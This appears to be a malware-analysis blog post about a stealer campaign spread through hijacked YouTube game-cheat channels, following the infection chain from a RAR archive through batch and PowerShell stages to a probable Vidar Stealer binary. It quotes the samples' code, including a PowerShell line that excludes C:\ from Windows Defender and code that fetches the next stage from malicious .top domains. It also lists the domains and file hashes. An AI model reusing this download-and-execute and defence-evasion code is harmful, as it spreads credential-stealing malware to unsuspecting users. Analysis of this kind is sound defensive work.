10.03.2025

Ongoing series: #1 #2 #3

youtube games cheat update

Through persistent tracking of the various hijacked YouTube channels, new uploads, and changes in descriptions, new versions of malware from this campaign were identified after takedowns by various File-hosting services (not by Google, as sites.google.com and drive.google.com remain a secure home for malware of any kind).

data-setup_x32_x64.rar Archive

As one of the changes, a data-setup_x32_x64.rar (SHA256: b2d56dd657da4f5427ebc78c2a377fd2f4c927572362ec322237605b47eda702) archive was delivered. This was once again a collection of various files and executables, most of them without any usage or malicious context. The only file executed was Setup.exe in the main directory. This file then creates and executes extract_and_run.bat.

extract_and_run.bat Script

This batch script uses the additionally included 7z to extract bin into a newly created folder (with the password YOUR_PASSWORD) and then executes sss.bat contained within.

    ) else if exist bin (
        echo Found bin, renaming to bin.zip and extracting to !randFolder!...
        ren bin bin.zip
        mkdir !randFolder!
        7za.exe e bin.zip -pYOUR_PASSWORD -o!randFolder!

    if exist !randFolder!\sss.bat (
        timeout /t 2
        start "" "!randFolder!\sss.bat"
    ) else (
        echo sss.bat not found after extraction.
    )

However, this script is only used to invoke script1.ps1 (SHA256: F06FA0E85922EF5547E8EA7E2F5969D51FA09155DCE17B081022476F3B08074F), which is also located in the folder, using PowerShell.

script1.ps1 Script

This script then generates and displays fake output for the user. Additionally, an exception for Windows Defender is added for the system drive in the background, and instructions for the next stage are downloaded.

    powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\'"

    $downloadURL = "https://yaykisobakitop.top/kjlrfejkrfkrerfk3fkfrkerlkfr3ejhkRKFJKERKJFREWKJ34JK34JKDWK/xxx"
    $localAppDataPath = [System.Environment]::GetFolderPath('ApplicationData')

    $httpClient = New-Object System.Net.WebClient
    $httpClient.Headers.Add("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36/xevil")
    $encodedData = $httpClient.DownloadString($downloadURL)
    $decodedURLList = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($encodedData)).Split("`n")

After a successful request (only possible with a set custom header), the response contains a Base64-encoded URL for downloading the final payload: https://sisiskipiskuhvostiki.top/fwefwe324234234rgeffwehtrwyrhtrhtqwfqwd31kjhjhfhejewhljklk4l243lkfjksksd2fefwsda/uploads/EFewefwewFEW342234423234feWEEFWWefewefweffewwefEWF.php?file=123123123123.exe. This file is also downloaded, saved in the previously determined $localAppDataPath directory with a randomly generated name, and executed after a 5-second pause (likely for evasion against analysis boxes).

123123123123.exe Executable

The downloaded file (SHA256: D24E47EDEBBECB0A0C2389E832825412FBC563C3782556DDB89FD2A7A328331A) is an obfuscated C++ binary. Based on the readable imports and various strings, it can already be identified as a stealer variant. When executed, it exports configurations and stored information from browsers like Firefox and Chrome. Additionally, the creation and usage of a mutex named approve_april can be observed. This, along with the previously used domain for downloading the payload, strongly suggests that it is a Vidar Stealer.